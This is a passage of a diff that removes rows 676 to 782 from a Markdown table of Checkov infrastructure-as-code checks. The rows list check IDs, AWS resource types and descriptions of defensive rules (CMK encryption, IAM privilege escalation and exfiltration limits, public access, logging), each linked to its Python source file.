-| 676 | CKV_AWS_267 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's model is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerModelUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerModelUsesCMK.py) |
-| 677 | CKV_AWS_268 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerVolumeUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerVolumeUsesCMK.py) |
-| 678 | CKV_AWS_269 | resource | aws_connect_instance_storage_config | Ensure Connect Instance Kinesis Video Stream Storage Config uses CMK | Terraform | [ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py) |
-| 679 | CKV_AWS_270 | resource | aws_connect_instance_storage_config | Ensure Connect Instance S3 Storage Config uses CMK | Terraform | [ConnectInstanceS3StorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceS3StorageConfigUsesCMK.py) |
-| 680 | CKV_AWS_271 | resource | aws_dynamodb_table_replica | Ensure DynamoDB table replica KMS encryption uses CMK | Terraform | [DynamoDBTableReplicaKMSUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTableReplicaKMSUsesCMK.py) |
-| 681 | CKV_AWS_272 | resource | aws_lambda_function | Ensure AWS Lambda function is configured to validate code-signing | Terraform | [LambdaCodeSigningConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaCodeSigningConfigured.py) |
-| 682 | CKV_AWS_273 | resource | aws_iam_user | Ensure access is controlled through SSO and not AWS IAM defined users | Terraform | [IAMUserNotUsedForAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserNotUsedForAccess.py) |
-| 683 | CKV_AWS_274 | resource | aws_iam_group_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
-| 684 | CKV_AWS_274 | resource | aws_iam_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
-| 685 | CKV_AWS_274 | resource | aws_iam_role | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
-| 686 | CKV_AWS_274 | resource | aws_iam_role_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
-| 687 | CKV_AWS_274 | resource | aws_iam_user_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
-| 688 | CKV_AWS_274 | resource | aws_ssoadmin_managed_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
-| 689 | CKV_AWS_275 | data | aws_iam_policy | Disallow policies from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMManagedAdminPolicy.py) |
-| 690 | CKV_AWS_276 | resource | aws_api_gateway_method_settings | Ensure Data Trace is not enabled in API Gateway Method Settings | Terraform | [APIGatewayMethodSettingsDataTrace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsDataTrace.py) |
-| 691 | CKV_AWS_277 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) |
-| 692 | CKV_AWS_277 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) |
-| 693 | CKV_AWS_277 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) |
-| 694 | CKV_AWS_278 | resource | aws_memorydb_snapshot | Ensure MemoryDB snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [MemoryDBSnapshotEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBSnapshotEncryptionWithCMK.py) |
-| 695 | CKV_AWS_279 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is securely encrypted | Terraform | [NeptuneClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncrypted.py) |
-| 696 | CKV_AWS_280 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterSnapshotEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncryptedWithCMK.py) |
-| 697 | CKV_AWS_281 | resource | aws_redshift_snapshot_copy_grant | Ensure RedShift snapshot copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py) |
-| 698 | CKV_AWS_282 | resource | aws_redshiftserverless_namespace | Ensure that Redshift Serverless namespace is encrypted by KMS using a customer managed key (CMK) | Terraform | [RedshiftServerlessNamespaceKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftServerlessNamespaceKMSKey.py) |
-| 699 | CKV_AWS_283 | data | aws_iam_policy_document | Ensure no IAM policies documents allow ALL or any AWS principal permissions to the resource | Terraform | [IAMPublicActionsPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPublicActionsPolicy.py) |
-| 700 | CKV_AWS_284 | resource | aws_sfn_state_machine | Ensure State Machine has X-Ray tracing enabled | Terraform | [StateMachineXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineXray.py) |
-| 701 | CKV_AWS_285 | resource | aws_sfn_state_machine | Ensure State Machine has execution history logging enabled | Terraform | [StateMachineLoggingExecutionHistory.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineLoggingExecutionHistory.py) |
-| 702 | CKV_AWS_286 | resource | aws_iam_group_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) |
-| 703 | CKV_AWS_286 | resource | aws_iam_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) |
-| 704 | CKV_AWS_286 | resource | aws_iam_role_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) |
-| 705 | CKV_AWS_286 | resource | aws_iam_user_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) |
-| 706 | CKV_AWS_286 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) |
-| 707 | CKV_AWS_287 | resource | aws_iam_group_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) |
-| 708 | CKV_AWS_287 | resource | aws_iam_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) |
-| 709 | CKV_AWS_287 | resource | aws_iam_role_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) |
-| 710 | CKV_AWS_287 | resource | aws_iam_user_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) |
-| 711 | CKV_AWS_287 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) |
-| 712 | CKV_AWS_288 | resource | aws_iam_group_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) |
-| 713 | CKV_AWS_288 | resource | aws_iam_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) |
-| 714 | CKV_AWS_288 | resource | aws_iam_role_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) |
-| 715 | CKV_AWS_288 | resource | aws_iam_user_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) |
-| 716 | CKV_AWS_288 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) |
-| 717 | CKV_AWS_289 | resource | aws_iam_group_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) |
-| 718 | CKV_AWS_289 | resource | aws_iam_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) |
-| 719 | CKV_AWS_289 | resource | aws_iam_role_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) |
-| 720 | CKV_AWS_289 | resource | aws_iam_user_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) |
-| 721 | CKV_AWS_289 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) |
-| 722 | CKV_AWS_290 | resource | aws_iam_group_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) |
-| 723 | CKV_AWS_290 | resource | aws_iam_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) |
-| 724 | CKV_AWS_290 | resource | aws_iam_role_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) |
-| 725 | CKV_AWS_290 | resource | aws_iam_user_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) |
-| 726 | CKV_AWS_290 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) |
-| 727 | CKV_AWS_291 | resource | AWS::MSK::Cluster | Ensure MSK nodes are private | Cloudformation | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py) |
-| 728 | CKV_AWS_291 | resource | aws_msk_cluster | Ensure MSK nodes are private | Terraform | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterNodesArePrivate.py) |
-| 729 | CKV_AWS_292 | resource | aws_docdb_global_cluster | Ensure DocumentDB Global Cluster is encrypted at rest (default is unencrypted) | Terraform | [DocDBGlobalClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBGlobalClusterEncryption.py) |
-| 730 | CKV_AWS_293 | resource | aws_db_instance | Ensure that AWS database instances have deletion protection enabled | Terraform | [RDSInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceDeletionProtection.py) |
-| 731 | CKV_AWS_294 | resource | aws_cloudtrail_event_data_store | Ensure CloudTrail Event Data Store uses CMK | Terraform | [CloudtrailEventDataStoreUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEventDataStoreUsesCMK.py) |
-| 732 | CKV_AWS_295 | resource | aws_datasync_location_object_storage | Ensure DataSync Location Object Storage doesn't expose secrets | Terraform | [DatasyncLocationExposesSecrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DatasyncLocationExposesSecrets.py) |
-| 733 | CKV_AWS_296 | resource | aws_dms_endpoint | Ensure DMS endpoint uses Customer Managed Key (CMK) | Terraform | [DMSEndpointUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSEndpointUsesCMK.py) |
-| 734 | CKV_AWS_297 | resource | aws_scheduler_schedule | Ensure EventBridge Scheduler Schedule uses Customer Managed Key (CMK) | Terraform | [SchedulerScheduleUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SchedulerScheduleUsesCMK.py) |
-| 735 | CKV_AWS_298 | resource | aws_dms_s3_endpoint | Ensure DMS S3 uses Customer Managed Key (CMK) | Terraform | [DMSS3UsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSS3UsesCMK.py) |
-| 736 | CKV_AWS_300 | resource | aws_s3_bucket_lifecycle_configuration | Ensure S3 lifecycle configuration sets period for aborting failed uploads | Terraform | [S3AbortIncompleteUploads.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py) |
-| 737 | CKV_AWS_301 | resource | aws_lambda_permission | Ensure that AWS Lambda function is not publicly accessible | Terraform | [LambdaFunctionIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionIsNotPublic.py) |
-| 738 | CKV_AWS_302 | resource | aws_db_snapshot | Ensure DB Snapshots are not Public | Terraform | [DBSnapshotsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotsArePrivate.py) |
-| 739 | CKV_AWS_303 | resource | aws_ssm_document | Ensure SSM documents are not Public | Terraform | [SSMDocumentsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMDocumentsArePrivate.py) |
-| 740 | CKV_AWS_304 | resource | aws_secretsmanager_secret_rotation | Ensure Secrets Manager secrets should be rotated within 90 days | Terraform | [SecretManagerSecret90days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecret90days.py) |
-| 741 | CKV_AWS_305 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a default root object configured | Terraform | [CloudfrontDistributionDefaultRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionDefaultRoot.py) |
-| 742 | CKV_AWS_306 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instances should be launched into a custom VPC | Terraform | [SagemakerNotebookInCustomVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInCustomVPC.py) |
-| 743 | CKV_AWS_307 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Users should not have root access to SageMaker notebook instances | Terraform | [SagemakerNotebookRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookRoot.py) |
-| 744 | CKV_AWS_308 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is set to encrypted | Terraform | [APIGatewayMethodSettingsCacheEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py) |
-| 745 | CKV_AWS_309 | resource | aws_apigatewayv2_route | Ensure API GatewayV2 routes specify an authorization type | Terraform | [APIGatewayV2RouteDefinesAuthorizationType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayV2RouteDefinesAuthorizationType.py) |
-| 746 | CKV_AWS_310 | resource | aws_cloudfront_distribution | Ensure CloudFront distributions should have origin failover configured | Terraform | [CloudfrontDistributionOriginFailover.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionOriginFailover.py) |
-| 747 | CKV_AWS_311 | resource | aws_codebuild_project | Ensure that CodeBuild S3 logs are encrypted | Terraform | [CodebuildS3LogsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildS3LogsEncrypted.py) |
-| 748 | CKV_AWS_312 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk environments have enhanced health reporting enabled | Terraform | [ElasticBeanstalkUseEnhancedHealthChecks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseEnhancedHealthChecks.py) |
-| 749 | CKV_AWS_313 | resource | aws_rds_cluster | Ensure RDS cluster configured to copy tags to snapshots | Terraform | [RDSClusterCopyTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterCopyTags.py) |
-| 750 | CKV_AWS_314 | resource | aws_codebuild_project | Ensure CodeBuild project environments have a logging configuration | Terraform | [CodebuildHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildHasLogs.py) |
-| 751 | CKV_AWS_315 | resource | aws_autoscaling_group | Ensure EC2 Auto Scaling groups use EC2 launch templates | Terraform | [AutoScalingLaunchTemplate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingLaunchTemplate.py) |
-| 752 | CKV_AWS_316 | resource | aws_codebuild_project | Ensure CodeBuild project environments do not have privileged mode enabled | Terraform | [CodeBuildPrivilegedMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildPrivilegedMode.py) |
-| 753 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) |
-| 754 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) |
-| 755 | CKV_AWS_317 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) |
-| 756 | CKV_AWS_317 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) |
-| 757 | CKV_AWS_318 | resource | aws_elasticsearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) |
-| 758 | CKV_AWS_318 | resource | aws_opensearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) |
-| 759 | CKV_AWS_319 | resource | aws_cloudwatch_metric_alarm | Ensure that CloudWatch alarm actions are enabled | Terraform | [CloudWatchAlarmsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchAlarmsEnabled.py) |
-| 760 | CKV_AWS_320 | resource | aws_redshift_cluster | Ensure Redshift clusters do not use the default database name | Terraform | [RedshiftClusterDatabaseName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterDatabaseName.py) |
-| 761 | CKV_AWS_321 | resource | aws_redshift_cluster | Ensure Redshift clusters use enhanced VPC routing | Terraform | [RedshiftClusterUseEnhancedVPCRouting.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterUseEnhancedVPCRouting.py) |
-| 762 | CKV_AWS_322 | resource | aws_elasticache_cluster | Ensure ElastiCache for Redis cache clusters have auto minor version upgrades enabled | Terraform | [ElasticCacheAutomaticMinorUpgrades.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticMinorUpgrades.py) |
-| 763 | CKV_AWS_323 | resource | aws_elasticache_cluster | Ensure ElastiCache clusters do not use the default subnet group | Terraform | [ElastiCacheHasCustomSubnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElastiCacheHasCustomSubnet.py) |
-| 764 | CKV_AWS_324 | resource | aws_rds_cluster | Ensure that RDS Cluster log capture is enabled | Terraform | [RDSClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterLogging.py) |
-| 765 | CKV_AWS_325 | resource | aws_rds_cluster | Ensure that RDS Cluster audit logging is enabled for MySQL engine | Terraform | [RDSClusterAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuditLogging.py) |
-| 766 | CKV_AWS_326 | resource | aws_rds_cluster | Ensure that RDS Aurora Clusters have backtracking enabled | Terraform | [RDSClusterAuroraBacktrack.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuroraBacktrack.py) |
-| 767 | CKV_AWS_327 | resource | aws_rds_cluster | Ensure RDS Clusters are encrypted using KMS CMKs | Terraform | [RDSClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncryptedWithCMK.py) |
-| 768 | CKV_AWS_328 | resource | aws_alb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) |
-| 769 | CKV_AWS_328 | resource | aws_elb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) |
-| 770 | CKV_AWS_328 | resource | aws_lb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) |
-| 771 | CKV_AWS_329 | resource | aws_efs_access_point | EFS access points should enforce a root directory | Terraform | [EFSAccessPointRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessPointRoot.py) |
-| 772 | CKV_AWS_330 | resource | aws_efs_access_point | EFS access points should enforce a user identity | Terraform | [EFSAccessUserIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessUserIdentity.py) |
-| 773 | CKV_AWS_331 | resource | aws_ec2_transit_gateway | Ensure Transit Gateways do not automatically accept VPC attachment requests | Terraform | [Ec2TransitGatewayAutoAccept.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/Ec2TransitGatewayAutoAccept.py) |
-| 774 | CKV_AWS_332 | resource | aws_ecs_service | Ensure ECS Fargate services run on the latest Fargate platform version | Terraform | [ECSServiceFargateLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServiceFargateLatest.py) |
-| 775 | CKV_AWS_333 | resource | aws_ecs_service | Ensure ECS services do not have public IP addresses assigned to them automatically | Terraform | [ECSServicePublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServicePublicIP.py) |
-| 776 | CKV_AWS_334 | resource | aws_ecs_task_definition | Ensure ECS containers should run as non-privileged | Terraform | [ECSContainerPrivilege.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerPrivilege.py) |
-| 777 | CKV_AWS_335 | resource | aws_ecs_task_definition | Ensure ECS task definitions should not share the host's process namespace | Terraform | [ECSContainerHostProcess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerHostProcess.py) |
-| 778 | CKV_AWS_336 | resource | aws_ecs_task_definition | Ensure ECS containers are limited to read-only access to root filesystems | Terraform | [ECSContainerReadOnlyRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerReadOnlyRoot.py) |
-| 779 | CKV_AWS_337 | resource | aws_ssm_parameter | Ensure SSM parameters are using KMS CMK | Terraform | [SSMParameterUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py) |
-| 780 | CKV_AWS_338 | resource | aws_cloudwatch_log_group | Ensure CloudWatch log groups retains logs for at least 1 year | Terraform | [CloudWatchLogGroupRetentionYear.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetentionYear.py) |
-| 781 | CKV_AWS_339 | resource | aws_eks_cluster | Ensure EKS clusters run on a supported Kubernetes version | Terraform | [EKSPlatformVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py) |
-| 782 | CKV_AWS_340 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk managed platform updates are enabled | Terraform | [ElasticBeanstalkUseManagedUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseManagedUpdates.py) |
